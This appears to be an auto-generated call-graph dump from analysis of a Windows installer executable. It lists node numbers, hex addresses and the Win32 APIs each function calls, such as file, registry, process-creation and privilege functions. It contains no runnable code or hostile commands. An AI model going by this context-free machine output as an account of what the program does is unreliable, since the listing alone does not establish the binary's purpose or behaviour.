3298 4060ae 3295->3298 3297->3298 3300 405fac wsprintfA 3297->3300 3298->3280 3299 405f73 CloseHandle GetShortPathNameW 3299->3298 3301 405f87 3299->3301 3302 406234 18 API calls 3300->3302 3301->3295 3301->3298 3303 405fd4 3302->3303 3321 405de7 GetFileAttributesW CreateFileW 3303->3321 3305 405fe1 3305->3298 3306 405ff0 GetFileSize GlobalAlloc 3305->3306 3307 406012 3306->3307 3308 4060a7 CloseHandle 3306->3308 3322 405e6a ReadFile 3307->3322 3308->3298 3313 406031 lstrcpyA 3318 406053 3313->3318 3314 406045 3315 405d4c 4 API calls 3314->3315 3315->3318 3316 40608a SetFilePointer 3329 405e99 WriteFile 3316->3329 3318->3316 3320->3299 3321->3305 3323 405e88 3322->3323 3323->3308 3324 405d4c lstrlenA 3323->3324 3325 405d8d lstrlenA 3324->3325 3326 405d66 lstrcmpiA 3325->3326 3328 405d95 3325->3328 3327 405d84 CharNextA 3326->3327 3326->3328 3327->3325 3328->3313 3328->3314 3330 405eb7 GlobalFree 3329->3330 3330->3308 3927 401e43 3928 402c31 18 API calls 3927->3928 3929 401e49 3928->3929 3930 402c31 18 API calls 3929->3930 3931 401e55 3930->3931 3932 401e61 ShowWindow 3931->3932 3933 401e6c EnableWindow 3931->3933 3934 402adb 3932->3934 3933->3934 3935 4028c3 3936 402c53 18 API calls 3935->3936 3937 4028d1 3936->3937 3938 4028e7 3937->3938 3939 402c53 18 API calls 3937->3939 3940 405dc2 2 API calls 3938->3940 3939->3938 3941 4028ed 3940->3941 3963 405de7 GetFileAttributesW CreateFileW 3941->3963 3943 4028fa 3944 402906 GlobalAlloc 3943->3944 3945 40299d 3943->3945 3946 402994 CloseHandle 3944->3946 3947 40291f 3944->3947 3948 4029a5 DeleteFileW 3945->3948 3949 4029b8 3945->3949 3946->3945 3964 403402 SetFilePointer 3947->3964 3948->3949 3951 402925 3952 4033ec ReadFile 3951->3952 3953 40292e GlobalAlloc 3952->3953 3954 402972 3953->3954 3955 40293e 3953->3955 3956 405e99 WriteFile 3954->3956 3957 40317b 45 API calls 3955->3957 3958 40297e GlobalFree 3956->3958 3962 40294b 3957->3962 3959 40317b 45 API calls 3958->3959 3960 402991 3959->3960 3960->3946 3961 402969 GlobalFree 3961->3954 3962->3961 3963->3943 3964->3951 3965 404ac7 3966 404af3 3965->3966 3967 404ad7 3965->3967 3969 404b26 3966->3969 3970 404af9 SHGetPathFromIDListW 3966->3970 3976 40593b GetDlgItemTextW 3967->3976 3972 404b10 SendMessageW 3970->3972 3973 404b09 3970->3973 3971 404ae4 SendMessageW 3971->3966 3972->3969 3974 40140b 2 API calls 3973->3974 3974->3972 3976->3971 3344 40344a SetErrorMode GetVersion 3345 403485 3344->3345 3346 40347f 3344->3346 3348 40657c 3 API calls 3345->3348 3347 4065ec 5 API calls 3346->3347 3347->3345 3349 40349b lstrlenA 3348->3349 3349->3345 3350 4034ab 3349->3350 3351 4065ec 5 API calls 3350->3351 3352 4034b3 3351->3352 3353 4065ec 5 API calls 3352->3353 3354 4034ba #17 OleInitialize SHGetFileInfoW 3353->3354 3432 406212 lstrcpynW 3354->3432 3356 4034f7 GetCommandLineW 3433 406212 lstrcpynW 3356->3433 3358 403509 GetModuleHandleW 3359 403521 3358->3359 3360 405bf3 CharNextW 3359->3360 3361 403530 CharNextW 3360->3361 3362 40365a GetTempPathW 3361->3362 3370 403549 3361->3370 3434 403419 3362->3434 3364 403672 3365 403676 GetWindowsDirectoryW lstrcatW 3364->3365 3366 4036cc DeleteFileW 3364->3366 3367 403419 12 API calls 3365->3367 3444 402ed5 GetTickCount GetModuleFileNameW 3366->3444 3371 403692 3367->3371 3368 405bf3 CharNextW 3368->3370 3370->3368 3376 403645 3370->3376 3377 403643 3370->3377 3371->3366 3372 403696 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3371->3372 3375 403419 12 API calls 3372->3375 3373 403797 ExitProcess CoUninitialize 3379 4038cd 3373->3379 3380 4037ad 3373->3380 3374 4036e0 3374->3373 3378 403783 3374->3378 3386 405bf3 CharNextW 3374->3386 3384 4036c4 3375->3384 3530 406212 lstrcpynW 3376->3530 3377->3362 3474 403a5b 3378->3474 3382 403951 ExitProcess 3379->3382 3383 4038d5 GetCurrentProcess OpenProcessToken 3379->3383 3533 405957 3380->3533 3390 403921 3383->3390 3391 4038ed LookupPrivilegeValueW AdjustTokenPrivileges 3383->3391 3384->3366 3384->3373 3400 4036ff 3386->3400 3393 4065ec 5 API calls 3390->3393 3391->3390 3392 403793 3392->3373 3396 403928 3393->3396 3394 4037c3 3397 4058da 5 API calls 3394->3397 3395 40375d 3398 405cce 18 API calls 3395->3398 3399 40393d ExitWindowsEx 3396->3399 3403 40394a 3396->3403 3401 4037c8 lstrcatW 3397->3401 3402 403769 3398->3402 3399->3382 3399->3403 3400->3394 3400->3395 3404 4037e4 lstrcatW lstrcmpiW 3401->3404 3405 4037d9 lstrcatW 3401->3405 3402->3373 3531 406212 lstrcpynW 3402->3531 3542 40140b 3403->3542 3404->3373 3407 403800 3404->3407 3405->3404 3409 403805 3407->3409 3410 40380c 3407->3410 3412 405840 4 API calls 3409->3412 3414 4058bd 2 API calls 3410->3414 3411 403778 3532 406212 lstrcpynW 3411->3532 3415 40380a 3412->3415 3416 403811 SetCurrentDirectoryW 3414->3416 3415->3416 3417 403821 3416->3417 3418 40382c 3416->3418 3537 406212 lstrcpynW 3417->3537 3538 406212 lstrcpynW 3418->3538 3421 406234 18 API calls 3422 40386b DeleteFileW 3421->3422 3423 403878 CopyFileW 3422->3423 3429 40383a 3422->3429 3423->3429 3424 4038c1 3425 4060b3 38 API calls 3424->3425 3427 4038c8 3425->3427 3426 4060b3 38 API calls 3426->3429 3427->3373 3428 406234 18 API calls 3428->3429 3429->3421 3429->3424 3429->3426 3429->3428 3431 4038ac CloseHandle 3429->3431 3539 4058f2 CreateProcessW 3429->3539 3431->3429 3432->3356 3433->3358 3435 4064a6 5 API calls 3434->3435 3436 403425 3435->3436 3437 40342f 3436->3437 3438 405bc6 3 API calls 3436->3438 3437->3364 3439 403437 3438->3439 3440 4058bd 2 API calls 3439->3440 3441 40343d 3440->3441 3545 405e16 3441->3545 3549 405de7 GetFileAttributesW CreateFileW 3444->3549 3446 402f18 3473 402f25 3446->3473 3550 406212 lstrcpynW 3446->3550 3448 402f3b 3449 405c12 2 API calls 3448->3449 3450 402f41 3449->3450 3551 406212 lstrcpynW 3450->3551 3452 402f4c GetFileSize 3453 40304d 3452->3453 3471 402f63 3452->3471 3552 402e33 3453->3552 3457 403090 GlobalAlloc 3461 4030a7 3457->3461 3458 4030e8 3459 402e33 33 API calls 3458->3459 3459->3473 3465 405e16 2 API calls 3461->3465 3462 403071 3463 4033ec ReadFile 3462->3463 3466 40307c 3463->3466 3464 402e33 33 API calls 3464->3471 3467 4030b8 CreateFileW 3465->3467 3466->3457 3466->3473 3468 4030f2 3467->3468 3467->3473 3567 403402 SetFilePointer 3468->3567 3470 403100 3568 40317b 3470->3568 3471->3453 3471->3458 3471->3464 3471->3473 3583 4033ec 3471->3583 3473->3374 3475 4065ec 5 API calls 3474->3475 3476 403a6f 3475->3476 3477 403a75 3476->3477 3478 403a87 3476->3478 3631 406159 wsprintfW 3477->3631 3479 4060df 3 API calls 3478->3479 3480 403ab7 3479->3480 3481 403ad6 lstrcatW 3480->3481 3484 4060df 3 API calls 3480->3484 3483 403a85 3481->3483 3615 403d31 3483->3615 3484->3481 3487 405cce 18 API calls 3488 403b08 3487->3488 3489 403b9c 3488->3489 3492 4060df 3 API calls 3488->3492 3490 405cce 18 API calls 3489->3490 3491 403ba2 3490->3491 3493 403bb2 LoadImageW 3491->3493 3495 406234 18 API calls 3491->3495 3494 403b3a 3492->3494 3496 403c58 3493->3496 3497 403bd9 RegisterClassW 3493->3497 3494->3489 3498 403b5b lstrlenW 3494->3498 3502 405bf3 CharNextW 3494->3502 3495->3493 3501 40140b 2 API calls 3496->3501 3499 403c62 3497->3499 3500 403c0f SystemParametersInfoW CreateWindowExW 3497->3500 3503 403b69 lstrcmpiW 3498->3503 3504 403b8f 3498->3504 3499->3392 3500->3496 3505 403c5e 3501->3505 3506 403b58 3502->3506 3503->3504 3507 403b79 GetFileAttributesW 3503->3507 3508 405bc6 3 API calls 3504->3508 3505->3499 3510 403d31 19 API calls 3505->3510 3506->3498 3509 403b85 3507->3509 3511 403b95 3508->3511 3509->3504 3512 405c12 2 API calls 3509->3512 3513 403c6f 3510->3513 3632 406212 lstrcpynW 3511->3632 3512->3504 3515 403c7b ShowWindow 3513->3515 3516 403cfe 3513->3516 3518 40657c 3 API calls 3515->3518 3624 405444 OleInitialize 3516->3624 3520 403c93 3518->3520 3519 403d04 3522 403d20 3519->3522 3523 403d08 3519->3523 3521 403ca1 GetClassInfoW 3520->3521 3524 40657c 3 API calls 3520->3524 3526 403cb5 GetClassInfoW RegisterClassW 3521->3526 3527 403ccb DialogBoxParamW 3521->3527 3525 40140b 2 API calls 3522->3525 3523->3499 3529 40140b 2 API calls 3523->3529 3524->3521 3525->3499 3526->3527 3528 40140b 2 API calls 3527->3528 3528->3499 3529->3499 3530->3377 3531->3411 3532->3378 3534 40596c 3533->3534 3535 4037bb ExitProcess 3534->3535 3536 405980 MessageBoxIndirectW 3534->3536 3536->3535 3537->3418 3538->3429 3540 405931 3539->3540 3541 405925 CloseHandle 3539->3541 3540->3429 3541->3540 3543 401389 2 API calls 3542->3543 3544 401420 3543->3544 3544->3382 3546 405e23 GetTickCount GetTempFileNameW 3545->3546 3547 403448 3546->3547 3548 405e59 3546->3548 3547->3364 3548->3546 3548->3547 3549->3446 3550->3448 3551->3452 3553 402e44 3552->3553 3554 402e5c 3552->3554 3555 402e54 3553->3555 3556 402e4d DestroyWindow 3553->3556 3557 402e64 3554->3557 3558 402e6c GetTickCount 3554->3558 3555->3457 3555->3473 3586 403402 SetFilePointer 3555->3586 3556->3555 3587 406628 3557->3587 3558->3555 3560 402e7a 3558->3560 3561 402e82 3560->3561 3562 402eaf CreateDialogParamW ShowWindow 3560->3562 3561->3555 3591 402e17 3561->3591 3562->3555 3564 402e90 wsprintfW 3565 405371 25 API calls 3564->3565 3566 402ead 3565->3566 3566->3555 3567->3470 3569 4031a6 3568->3569 3570 40318a SetFilePointer 3568->3570 3594 403283 GetTickCount 3569->3594 3570->3569 3573 403243 3573->3473 3574 405e6a ReadFile 3575 4031c6 3574->3575 3575->3573 3576 403283 43 API calls 3575->3576 3577 4031dd 3576->3577 3577->3573 3578 403249 ReadFile 3577->3578 3580 4031ec 3577->3580 3578->3573 3580->3573 3581 405e6a ReadFile 3580->3581 3582 405e99 WriteFile 3580->3582 3581->3580 3582->3580 3584 405e6a ReadFile 3583->3584 3585 4033ff 3584->3585 3585->3471 3586->3462 3588 406645 PeekMessageW 3587->3588 3589 406655 3588->3589 3590 40663b DispatchMessageW 3588->3590 3589->3555 3590->3588 3592 402e26 3591->3592 3593 402e28 MulDiv 3591->3593 3592->3593 3593->3564 3595 4032b1 3594->3595 3596 4033db 3594->3596 3607 403402 SetFilePointer 3595->3607 3597 402e33 33 API calls 3596->3597 3604 4031ad 3597->3604 3599 4032bc SetFilePointer 3603 4032e1 3599->3603 3600 4033ec ReadFile 3600->3603 3602 402e33 33 API calls 3602->3603 3603->3600 3603->3602 3603->3604 3605 405e99 WriteFile 3603->3605 3606 4033bc SetFilePointer 3603->3606 3608 40672b 3603->3608 3604->3573 3604->3574 3605->3603 3606->3596 3607->3599 3609 406750 3608->3609 3610 406758 3608->3610 3609->3603 3610->3609 3611 4067e8 GlobalAlloc 3610->3611 3612 4067df GlobalFree 3610->3612 3613 406856 GlobalFree 3610->3613 3614 40685f GlobalAlloc 3610->3614 3611->3609 3611->3610 3612->3611 3613->3614 3614->3609 3614->3610 3616 403d45 3615->3616 3633 406159 wsprintfW 3616->3633 3618 403db6 3619 406234 18 API calls 3618->3619 3620 403dc2 SetWindowTextW 3619->3620 3621 403ae6 3620->3621 3622 403dde 3620->3622 3621->3487 3622->3621 3623 406234 18 API calls 3622->3623 3623->3622 3634 404322 3624->3634 3626 40548e 3627 404322 SendMessageW 3626->3627 3629 4054a0 CoUninitialize 3627->3629 3628 405467 3628->3626 3637 401389 3628->3637 3629->3519 3631->3483 3632->3489 3633->3618 3635 40433a 3634->3635 3636 40432b SendMessageW 3634->3636 3635->3628 3636->3635 3639 401390 3637->3639 3638 4013fe 3638->3628 3639->3638 3640 4013cb MulDiv SendMessageW 3639->3640 3640->3639 3977 402a4b 3978 402c31 18 API calls 3977->3978 3979 402a51 3978->3979 3980 402a88 3979->3980 3982 4028a1 3979->3982 3983 402a63 3979->3983 3981 406234 18 API calls 3980->3981 3980->3982 3981->3982 3983->3982 3985 406159 wsprintfW 3983->3985 3985->3982 3989 4016cc 3990 402c53 18 API calls 3989->3990 3991 4016d2 GetFullPathNameW 3990->3991 3992 4016ec 3991->3992 3993 40170e 3991->3993 3992->3993 3996 406555 2 API calls 3992->3996 3994 401723 GetShortPathNameW 3993->3994 3995 402adb 3993->3995 3994->3995 3997 4016fe 3996->3997 3997->3993 3999 406212 lstrcpynW 3997->3999 3999->3993 4000 401b4d 4001 402c53 18 API calls 4000->4001 4002 401b54 4001->4002 4003 402c31 18 API calls 4002->4003 4004 401b5d wsprintfW 4003->4004 4005 402adb 4004->4005 4013 40234e 4014 402c53 18 API calls 4013->4014 4015 40235d 4014->4015 4016 402c53 18 API calls 4015->4016 4017 402366 4016->4017 4018 402c53 18 API calls 4017->4018 4019 402370 GetPrivateProfileStringW 4018->4019 4020 402851 4021 402859 4020->4021 4022 40285d FindNextFileW 4021->4022 4024 40286f 4021->4024 4023 4028b6 4022->4023 4022->4024 4026 406212 lstrcpynW 4023->4026 4026->4024 3819 401ed5 3820 402c53 18 API calls 3819->3820 3821 401edb 3820->3821 3822 405371 25 API calls 3821->3822 3823 401ee5 3822->3823 3824 4058f2 2 API calls 3823->3824 3825 401eeb 3824->3825 3826 4028a1 3825->3826 3827 401f4a CloseHandle 3825->3827 3828 401efb WaitForSingleObject 3825->3828 3827->3826 3829 401f0d 3828->3829 3830 401f1f GetExitCodeProcess 3829->3830 3833 406628 2 API calls 3829->3833 3831 401f31 3830->3831 3832 401f3e 3830->3832 3837 406159 wsprintfW 3831->3837 3832->3827 3835 401f3c 3832->3835 3836 401f14 WaitForSingleObject 3833->3836 3835->3827 3836->3829 3837->3835 4027 401956 4028 402c53 18 API calls 4027->4028 4029 40195d lstrlenW 4028->4029 4030 4025a8 4029->4030 4031 4014d7 4032 402c31 18 API calls 4031->4032 4033 4014dd Sleep 4032->4033 4035 402adb 4033->4035 4036 401f58 4037 402c53 18 API calls 4036->4037 4038 401f5f 4037->4038 4039 406555 2 API calls 4038->4039 4040 401f65 4039->4040 4042 401f76 4040->4042 4043 406159 wsprintfW 4040->4043 4043->4042 4044 402259 4045 402c53 18 API calls 4044->4045 4046 40225f 4045->4046 4047 402c53 18 API calls 4046->4047 4048 402268 4047->4048 4049 402c53 18 API calls 4048->4049 4050 402271 4049->4050 4051 406555 2 API calls 4050->4051 4052 40227a 4051->4052 4053 40228b lstrlenW lstrlenW 4052->4053 4057 40227e 4052->4057 4055 405371 25 API calls 4053->4055 4054 405371 25 API calls 4058 402286 4054->4058 4056 4022c9 SHFileOperationW 4055->4056 4056->4057 4056->4058 4057->4054 4057->4058 4059 4068da 4063 40675e 4059->4063 4060 4070c9 4061 4067e8 GlobalAlloc 4061->4060 4061->4063 4062 4067df GlobalFree 4062->4061 4063->4060 4063->4061 4063->4062 4064 406856 GlobalFree 4063->4064 4065 40685f GlobalAlloc 4063->4065 4064->4065 4065->4060 4065->4063 3838 40175c 3839 402c53 18 API calls 3838->3839 3840 401763 3839->3840 3841 405e16 2 API calls 3840->3841 3842 40176a 3841->3842 3843 405e16 2 API calls 3842->3843 3843->3842 4066 4022dd 4067 4022e4 4066->4067 4070 4022f7 4066->4070 4068 406234 18 API calls 4067->4068 4069 4022f1 4068->4069 4071 405957 MessageBoxIndirectW 4069->4071 4071->4070 4072 402660 4073 402c31 18 API calls 4072->4073 4074 40266f 4073->4074 4075 4026b9 ReadFile 4074->4075 4076 405e6a ReadFile 4074->4076 4077 4026f9 MultiByteToWideChar 4074->4077 4078 4027ae 4074->4078 4081 40271f SetFilePointer MultiByteToWideChar 4074->4081 4082 4027bf 4074->4082 4084 4027ac 4074->4084 4085 405ec8 SetFilePointer 4074->4085 4075->4074 4075->4084 4076->4074 4077->4074 4094 406159 wsprintfW 4078->4094 4081->4074 4083 4027e0 SetFilePointer 4082->4083 4082->4084 4083->4084 4086 405ee4 4085->4086 4091 405f00 4085->4091 4087 405e6a ReadFile 4086->4087 4088 405ef0 4087->4088 4089 405f31 SetFilePointer 4088->4089 4090 405f09 SetFilePointer 4088->4090 4088->4091 4089->4091 4090->4089 4092 405f14 4090->4092 4091->4074 4093 405e99 WriteFile 4092->4093 4093->4091 4094->4084 4095 401563 4096 402a81 4095->4096 4099 406159 wsprintfW 4096->4099 4098 402a86 4099->4098 4107 4052e5 4108 4052f5 4107->4108 4109 405309 4107->4109 4110 4052fb 4108->4110 4119 405352 4108->4119 4111 405311 IsWindowVisible 4109->4111 4114 405328 4109->4114 4112 404322 SendMessageW 4110->4112 4113 40531e 4111->4113 4111->4119 4116 405305 4112->4116 4120 404c3b SendMessageW 4113->4120 4115 405357 CallWindowProcW 4114->4115 4125 404cbb 4114->4125 4115->4116 4119->4115 4121 404c9a SendMessageW 4120->4121 4122 404c5e GetMessagePos ScreenToClient SendMessageW 4120->4122 4124 404c92 4121->4124 4123 404c97 4122->4123 4122->4124 4123->4121 4124->4114 4134 406212 lstrcpynW 4125->4134 4127 404cce 4135 406159 wsprintfW 4127->4135 4129 404cd8 4130 40140b 2 API calls 4129->4130 4131 404ce1 4130->4131 4136 406212 lstrcpynW 4131->4136 4133 404ce8 4133->4119 4134->4127 4135->4129 4136->4133 4137 401968 4138 402c31 18 API calls 4137->4138 4139 40196f 4138->4139 4140 402c31 18 API calls 4139->4140 4141 40197c 4140->4141 4142 402c53 18 API calls 4141->4142 4143 401993 lstrlenW 4142->4143 4144 4019a4 4143->4144 4145 4019e5 4144->4145 4149 406212 lstrcpynW 4144->4149 4147 4019d5 4147->4145 4148 4019da lstrlenW 4147->4148 4148->4145 4149->4147 3331 403969 3332 403984 3331->3332 3333 40397a CloseHandle 3331->3333 3334 403998 3332->3334 3335 40398e CloseHandle 3332->3335 3333->3332 3340 4039c6 3334->3340 3335->3334 3338 405a03 69 API calls 3339 4039a9 3338->3339 3341 4039d4 3340->3341 3342 40399d 3341->3342 3343 4039d9 FreeLibrary GlobalFree 3341->3343 3342->3338 3343->3342 3343->3343 3641 4023ea 3642 4023f0 3641->3642 3643 402c53 18 API calls 3642->3643 3644 402402 3643->3644 3645 402c53 18 API calls 3644->3645 3646 40240c RegCreateKeyExW 3645->3646 3647 402436 3646->3647 3649 4028a1 3646->3649 3648 402451 3647->3648 3650 402c53 18 API calls 3647->3650 3651 40245d 3648->3651 3658 402c31 3648->3658 3653 402447 lstrlenW 3650->3653 3652 40247c RegSetValueExW 3651->3652 3655 40317b 45 API calls 3651->3655 3656 402492 RegCloseKey 3652->3656 3653->3648 3655->3652 3656->3649 3659 406234 18 API calls 3658->3659 3660 402c46 3659->3660 3660->3651 4150 40166a 4151 402c53 18 API calls 4150->4151 4152 401670 4151->4152 4153 406555 2 API calls 4152->4153 4154 401676 4153->4154 4155 4043ea lstrcpynW lstrlenW 4156 404ced GetDlgItem GetDlgItem 4157 404d3f 7 API calls 4156->4157 4161 404f58 4156->4161 4158 404de2 DeleteObject 4157->4158 4159 404dd5 SendMessageW 4157->4159 4160 404deb 4158->4160 4159->4158 4162 404e22 4160->4162 4164 406234 18 API calls 4160->4164 4175 404c3b 5 API calls 4161->4175 4179 40503c 4161->4179 4188 404fc9 4161->4188 4165 4042d6 19 API calls 4162->4165 4163 4050e8 4168 4050f2 SendMessageW 4163->4168 4169 4050fa 4163->4169 4170 404e04 SendMessageW SendMessageW 4164->4170 4166 404e36 4165->4166 4171 4042d6 19 API calls 4166->4171 4167 404f4b 4173 40433d 8 API calls 4167->4173 4168->4169 4180 405113 4169->4180 4181 40510c ImageList_Destroy 4169->4181 4185 405123 4169->4185 4170->4160 4189 404e44 4171->4189 4172 405095 SendMessageW 4172->4167 4177 4050aa SendMessageW 4172->4177 4178 4052de 4173->4178 4174 40502e SendMessageW 4174->4179 4175->4188 4176 405292 4176->4167 4186 4052a4 ShowWindow GetDlgItem ShowWindow 4176->4186 4184 4050bd 4177->4184 4179->4163 4179->4167 4179->4172 4182 40511c GlobalFree 4180->4182 4180->4185 4181->4180 4182->4185 4183 404f19 GetWindowLongW SetWindowLongW 4187 404f32 4183->4187 4194 4050ce SendMessageW 4184->4194 4185->4176 4199 404cbb 4 API calls 4185->4199 4203 40515e 4185->4203 4186->4167 4190 404f50 4187->4190 4191 404f38 ShowWindow 4187->4191 4188->4174 4188->4179 4189->4183 4193 404e94 SendMessageW 4189->4193 4195 404f13 4189->4195 4197 404ed0 SendMessageW 4189->4197 4198 404ee1 SendMessageW 4189->4198 4208 40430b SendMessageW 4190->4208 4207 40430b SendMessageW 4191->4207 4193->4189 4194->4163 4195->4183 4195->4187 4197->4189 4198->4189 4199->4203 4200 405268 InvalidateRect 4200->4176 4201 40527e 4200->4201 4209 404bf6 4201->4209 4202 40518c SendMessageW 4206 4051a2 4202->4206 4203->4202 4203->4206 4205 405216 SendMessageW SendMessageW 4205->4206 4206->4200 4206->4205 4207->4167 4208->4161 4212 404b2d 4209->4212 4211 404c0b 4211->4176 4213 404b46 4212->4213 4214 406234 18 API calls 4213->4214 4215 404baa 4214->4215 4216 406234 18 API calls 4215->4216 4217 404bb5 4216->4217 4218 406234 18 API calls 4217->4218 4219 404bcb lstrlenW wsprintfW SetDlgItemTextW 4218->4219 4219->4211 4220 401ced 4221 402c31 18 API calls 4220->4221 4222 401cf3 IsWindow 4221->4222 4223 401a20 4222->4223 3698 40176f 3699 402c53 18 API calls 3698->3699 3700 401776 3699->3700 3701 401796 3700->3701 3702 40179e 3700->3702 3737 406212 lstrcpynW 3701->3737 3738 406212 lstrcpynW 3702->3738 3705 40179c 3709 4064a6 5 API calls 3705->3709 3706 4017a9 3707 405bc6 3 API calls 3706->3707 3708 4017af lstrcatW 3707->3708 3708->3705 3725 4017bb 3709->3725 3710 406555 2 API calls 3710->3725 3711 405dc2 2 API calls 3711->3725 3713 4017cd CompareFileTime 3713->3725 3714 40188d 3715 405371 25 API calls 3714->3715 3718 401897 3715->3718 3716 405371 25 API calls 3720 401879 3716->3720 3717 406212 lstrcpynW 3717->3725 3719 40317b 45 API calls 3718->3719 3721 4018aa 3719->3721 3722 4018be SetFileTime 3721->3722 3723 4018d0 CloseHandle 3721->3723 3722->3723 3723->3720 3726 4018e1 3723->3726 3724 406234 18 API calls 3724->3725 3725->3710 3725->3711 3725->3713 3725->3714 3725->3717 3725->3724 3731 405957 MessageBoxIndirectW 3725->3731 3734 401864 3725->3734 3736 405de7 GetFileAttributesW CreateFileW 3725->3736 3727 4018e6 3726->3727 3728 4018f9 3726->3728 3729 406234 18 API calls 3727->3729 3730 406234 18 API calls 3728->3730 3732 4018ee lstrcatW 3729->3732 3733 401901 3730->3733 3731->3725 3732->3733 3735 405957 MessageBoxIndirectW 3733->3735 3734->3716 3734->3720 3735->3720 3736->3725 3737->3705 3738->3706 4224 404771 4225 40479d 4224->4225 4226 4047ae 4224->4226 4285 40593b GetDlgItemTextW 4225->4285 4227 4047ba GetDlgItem 4226->4227 4230 404819 4226->4230 4229 4047ce 4227->4229 4233 4047e2 SetWindowTextW 4229->4233 4236 405c71 4 API calls 4229->4236 4238 406234 18 API calls 4230->4238 4247 4048fd 4230->4247 4283 404aac 4230->4283 4231 4047a8 4232 4064a6 5 API calls 4231->4232 4232->4226 4237 4042d6 19 API calls 4233->4237 4235 40433d 8 API calls 4240 404ac0 4235->4240 4241 4047d8 4236->4241 4242 4047fe 4237->4242 4243 40488d SHBrowseForFolderW 4238->4243 4239 40492d 4244 405cce 18 API calls 4239->4244 4241->4233 4249 405bc6 3 API calls 4241->4249 4245 4042d6 19 API calls 4242->4245 4246 4048a5 CoTaskMemFree 4243->4246 4243->4247 4248 404933 4244->4248 4250 40480c 4245->4250 4251 405bc6 3 API calls 4246->4251 4247->4283 4287 40593b GetDlgItemTextW 4247->4287 4288 406212 lstrcpynW 4248->4288 4249->4233 4286 40430b SendMessageW 4250->4286 4253 4048b2 4251->4253 4257 4048e9 SetDlgItemTextW 4253->4257 4260 406234 18 API calls 4253->4260 4255 40494a 4259 4065ec 5 API calls 4255->4259 4256 404812 4258 4065ec 5 API calls 4256->4258 4257->4247 4258->4230 4266 404951 4259->4266 4261 4048d1 lstrcmpiW 4260->4261 4261->4257 4263 4048e2 lstrcatW 4261->4263 4262 404992 4289 406212 lstrcpynW 4262->4289 4263->4257 4265 404999 4267 405c71 4 API calls 4265->4267 4266->4262 4271 405c12 2 API calls 4266->4271 4272 4049ea 4266->4272 4268 40499f GetDiskFreeSpaceW 4267->4268 4270 4049c3 MulDiv 4268->4270 4268->4272 4270->4272 4271->4266 4273 404a5b 4272->4273 4275 404bf6 21 API calls 4272->4275 4274 404a7e 4273->4274 4277 40140b 2 API calls 4273->4277 4290 4042f8 KiUserCallbackDispatcher 4274->4290 4276 404a48 4275->4276 4278 404a5d SetDlgItemTextW 4276->4278 4279 404a4d 4276->4279 4277->4274 4278->4273 4281 404b2d 21 API calls 4279->4281 4281->4273 4282 404a9a 4282->4283 4291 404706 4282->4291 4283->4235 4285->4231 4286->4256 4287->4239 4288->4255 4289->4265 4290->4282 4292 404714 4291->4292 4293 404719 SendMessageW 4291->4293 4292->4293 4293->4283 4294 401b71 4295 401bc2 4294->4295 4296 401b7e 4294->4296 4298 401bc7 4295->4298 4299 401bec GlobalAlloc 4295->4299 4297 4022e4 4296->4297 4303 401b95 4296->4303 4301 406234 18 API calls 4297->4301 4312 401c07 4298->4312 4315 406212 lstrcpynW 4298->4315 4300 406234 18 API calls 4299->4300 4300->4312 4305 4022f1 4301->4305 4313 406212 lstrcpynW 4303->4313 4304 401bd9 GlobalFree 4304->4312 4308 405957 MessageBoxIndirectW 4305->4308 4307 401ba4 4314 406212 lstrcpynW 4307->4314 4308->4312 4310 401bb3 4316 406212 lstrcpynW 4310->4316 4313->4307 4314->4310 4315->4304 4316->4312 4317 401a72 4318 402c31 18 API calls 4317->4318 4319 401a78 4318->4319 4320 402c31 18 API calls 4319->4320 4321 401a20 4320->4321 4322 404473 4323 40448b 4322->4323 4328 4045a5 4322->4328 4329 4042d6 19 API calls 4323->4329 4324 40460f 4325 4046e1 4324->4325 4326 404619 GetDlgItem 4324->4326 4330 40433d 8 API calls 4325->4330 4327 404633 4326->4327 4331 4046a2 4326->4331 4327->4331 4336 404659 6 API calls 4327->4336 4328->4324 4328->4325 4332 4045e0 GetDlgItem SendMessageW 4328->4332 4333 4044f2 4329->4333 4335 4046dc 4330->4335 4331->4325 4337 4046b4 4331->4337 4353 4042f8 KiUserCallbackDispatcher 4332->4353 4334 4042d6 19 API calls 4333->4334 4339 4044ff CheckDlgButton 4334->4339 4336->4331 4340 4046ca 4337->4340 4341 4046ba SendMessageW 4337->4341 4351 4042f8 KiUserCallbackDispatcher 4339->4351 4340->4335 4344 4046d0 SendMessageW 4340->4344 4341->4340 4342 40460a 4345 404706 SendMessageW 4342->4345 4344->4335 4345->4324 4346 40451d GetDlgItem 4352 40430b SendMessageW 4346->4352 4348 404533 SendMessageW 4349 404550 GetSysColor 4348->4349 4350 404559 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4348->4350 4349->4350 4350->4335 4351->4346 4352->4348 4353->4342 4354 401573 4355 401583 ShowWindow 4354->4355 4356 40158c 4354->4356 4355->4356 4357 40159a ShowWindow 4356->4357 4358 402adb 4356->4358 4357->4358 4359 4014f5 SetForegroundWindow 4360 402adb 4359->4360 4361 401e77 4362 402c53 18 API calls 4361->4362 4363 401e7d 4362->4363 4364 402c53 18 API calls 4363->4364 4365 401e86 4364->4365 4366 402c53 18 API calls 4365->4366 4367 401e8f 4366->4367 4368 402c53 18 API calls 4367->4368 4369 401e98 4368->4369 4370 401423 25 API calls 4369->4370 4371 401e9f ShellExecuteW 4370->4371 4372 401ed0 4371->4372 4380 40167b 4381 402c53 18 API calls 4380->4381 4382 401682 4381->4382 4383 402c53 18 API calls 4382->4383 4384 40168b 4383->4384 4385 402c53 18 API calls 4384->4385 4386 401694 MoveFileW 4385->4386 4387 4016a0 4386->4387 4388 4016a7 4386->4388 4390 401423 25 API calls 4387->4390 4389 406555 2 API calls 4388->4389 4392 402250 4388->4392 4391 4016b6 4389->4391 4390->4392 4391->4392 4393 4060b3 38 API calls 4391->4393 4393->4387 3844 403dfe 3845 403f51 3844->3845 3846 403e16 3844->3846 3848 403f62 GetDlgItem GetDlgItem 3845->3848 3849 403fa2 3845->3849 3846->3845 3847 403e22 3846->3847 3850 403e40 3847->3850 3851 403e2d SetWindowPos 3847->3851 3852 4042d6 19 API calls 3848->3852 3853 403ffc 3849->3853 3858 401389 2 API calls 3849->3858 3855 403e45 ShowWindow 3850->3855 3856 403e5d 3850->3856 3851->3850 3857 403f8c SetClassLongW 3852->3857 3854 404322 SendMessageW 3853->3854 3874 403f4c 3853->3874 3884 40400e 3854->3884 3855->3856 3859 403e65 DestroyWindow 3856->3859 3860 403e7f 3856->3860 3861 40140b 2 API calls 3857->3861 3862 403fd4 3858->3862 3913 40425f 3859->3913 3863 403e84 SetWindowLongW 3860->3863 3864 403e95 3860->3864 3861->3849 